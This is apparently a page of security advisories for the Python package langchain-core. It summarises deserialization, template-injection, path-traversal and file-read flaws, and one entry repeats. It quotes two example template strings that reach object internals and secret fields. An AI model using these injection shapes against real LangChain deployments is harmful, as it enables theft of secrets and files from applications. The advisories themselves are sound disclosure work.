Advisories for Pypi/Langchain-Core package

2026

LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists

LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call load() with allowed_objects="all". This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate …

LangChain has incomplete f-string validation in prompt templates

LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include: "{message.additional_kwargs[secret]}" "https://example.com/{image.class.name}.png" Second, f-string validation based on parsed top-level field names did not reject nested …

LangChain has incomplete f-string validation in prompt templates

LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include: "{message.additional_kwargs[secret]}" "https://example.com/{image.class.name}.png" Second, f-string validation based on parsed top-level field names did not reject nested …

LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions

Multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples). Note: The affected functions (load_prompt, load_prompt_from_config, and the .save() method on prompt classes) are undocumented legacy …

2025

LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs

A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.

LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates

Attackers who can control template strings (not just template variables) can: Access Python object attributes and internal properties via attribute traversal Extract sensitive information from object internals (e.g., class, globals) Potentially escalate to more severe attacks depending on the objects passed to templates Attackers who can control template strings (not just template variables) can: Access Python object attributes and internal properties via attribute traversal Extract sensitive information from object internals …

langchain-core allows unauthorized users to read arbitrary files from the host file system

A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate's (and by extension langchain_core.prompts.ChatPromptTemplate's) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead …

2024

LangChain's XMLOutputParser vulnerable to XML Entity Expansion

The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html This primarily affects users that combine an LLM (or agent) with the XMLOutputParser and expose the component via an endpoint on a web-service. This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise …

LangChain directory traversal vulnerability

LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.